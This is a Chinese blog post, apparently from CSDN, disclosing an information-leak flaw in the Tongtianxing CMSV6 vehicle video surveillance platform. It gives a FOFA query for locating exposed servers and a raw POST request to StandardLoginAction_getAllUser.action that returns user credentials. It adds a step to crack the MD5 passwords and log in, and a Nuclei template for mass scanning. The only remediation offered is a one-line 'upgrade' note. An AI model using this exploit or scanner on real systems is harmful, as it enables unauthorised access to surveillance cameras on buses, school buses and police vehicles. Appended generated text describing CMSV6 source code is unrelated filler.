通天星CMSV6 车载视频监控平台信息泄露漏洞

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。

通天星CMSV6车载视频监控平台 StandardLoginAction_getAllUser.action接口处存在信息泄露漏洞,恶意攻击者可能会利用该漏洞获取敏感信息,从而登录监控平台。

Ⅱ、fofa语句

body="/808gps/"

Ⅲ、漏洞复现

POC

POST /808gps/StandardLoginAction_getAllUser.action HTTP/1.1
Host:127.0.0.1
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 
json=null

1、构建poc

2、使用MD5解密密码登录系统

 

Ⅳ、Nuclei-POC

id: Tongtianxing-CMSV6

info:
  name: 通天星CMSV6车载视频监控平台 StandardLoginAction_getAllUser.action接口处存在信息泄露漏洞,恶意攻击者可能会利用该漏洞获取敏感信息,从而登录监控平台。
  author: WLF
  severity: high
  metadata: 
    fofa-query: body="/808gps/"
variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        POST /808gps/StandardLoginAction_getAllUser.action HTTP/1.1
        Host: {{Hostname}}
        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        
        json=null


    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"admin","password")

Ⅴ、修复建议

升级至安全版版本

  • 10
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
### 回答1: CMSV6是一款用于GPS定位系统的开源软件,可以帮助用户实现车辆的实时定位和轨迹追踪等功能。它是一套基于Web的管理平台,可以方便地监控车辆的运行状态,并提供详细的车辆信息、报警信息、位置信息等。 CMSV6的源码主要由前端和后端两部分组成。前端使用了流行的HTML、CSS和JavaScript等技术,Web页面展示车辆信息和地图界面。用户可以过浏览器访问CMSV6的管理平台,实时监控车辆的位置和状态。 后端主要使用了Java语言编写,使用了一些主流的开源框架,如Spring、Hibernate等,过数据库存储和管理车辆信息。后端主要负责接收车辆上传的GPS数据,处理数据并保存到数据库中,同时还负责处理用户的请求并返回相应的数据给前端。 CMSV6的源码过开源的方式发布,使得开发者可以根据自己的需求进行二次开发和定制。用户可以根据实际情况修改前端界面,增加或定制一些功能,以适应不同的应用场景。同时,开发者也可以根据自己的需求对后端进行二次开发,添加新的功能或者改进系统的性能。 总之,CMSV6是一款功能强大且灵活可定制的GPS定位系统,过其开源的源码,用户可以根据自己的需求进行定制开发,满足各种特定需求的车辆定位系统的搭建。 ### 回答2: CMSV6是一套开源的GPS定位系统源码,是一款应用于车辆管理领域的软件系统。该系统具备车辆定位、历史轨迹查询、报警处理、数据统计等功能,旨在提高车辆管理的效率和安全性。 CMSV6 GPS定位系统源码采用了现代化的软件开发技术,结合了GPS定位技术和互联网信技术,实现了对车辆实时定位和追踪、位置数据存储和查询、报警信息处理等功能。过与车载终端设备的配合,可以精确获取车辆的位置坐标、速度、方向等信息,并实时显示在地图上。同时,系统也支持对车辆历史轨迹进行查询和回放,方便用户了解车辆行驶的轨迹和情况。 CMSV6 GPS定位系统源码还具备报警处理功能,当车辆出现异常情况时,系统可以及时发出报警信息,如车辆超速、进入禁区等事件,提醒管理人员采取相应措施。在报警处理方面,系统还支持将报警信息发送给相关人员,以便快速处理。 此外,CMSV6 GPS定位系统源码还提供了数据统计功能,可以对车辆的行驶里程、停留时间、超速次数等进行统计分析,为车辆管理提供可靠的数据支持。 总之,CMSV6 GPS定位系统源码是一款功能齐全、性能稳定的软件系统,可以帮助用户实现对车辆的实时监控与管理,提高车辆管理的效率和安全性。 ### 回答3: CMSV6 GPS定位系统源码是一种用于实时定位和追踪车辆或物体的软件源码。该系统使用GPS接收器获取位置信息,并过无线网络传输到后台服务器。以下是该源码的主要特点和功能: 1. 支持多种GPS接收器:CMSV6系统源码兼容各种GPS接收器,包括常见的GPS模块和GPS芯片。用户可以根据自己的需求选择合适的GPS接收器。 2. 实时定位和追踪:CMSV6系统源码可以实时获取车辆或物体的位置信息,并在地图上进行显示。用户可以过网页或手机应用程序追踪车辆或物体的实时位置。 3. 轨迹记录和回放:CMSV6系统源码可以记录车辆或物体的运动轨迹,并且可以回放历史轨迹。用户可以过轨迹回放功能了解车辆或物体的行驶路线和时间。 4. 报警和提醒功能:CMSV6系统源码可以根据用户设置的规则触发报警和提醒。例如,用户可以设置越界报警,在车辆或物体超出指定区域时触发警报。 5. 多用户和权限管理:CMSV6系统源码支持多用户同时使用,并且具有权限管理功能。管理员可以根据不同用户的需求设置不同的数据访问权限。 总之,CMSV6 GPS定位系统源码是一种功能强大的软件源码,可以实现实时定位和追踪车辆或物体,并提供多种功能和定制选项,使用户能够轻松监控和管理相关信息

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值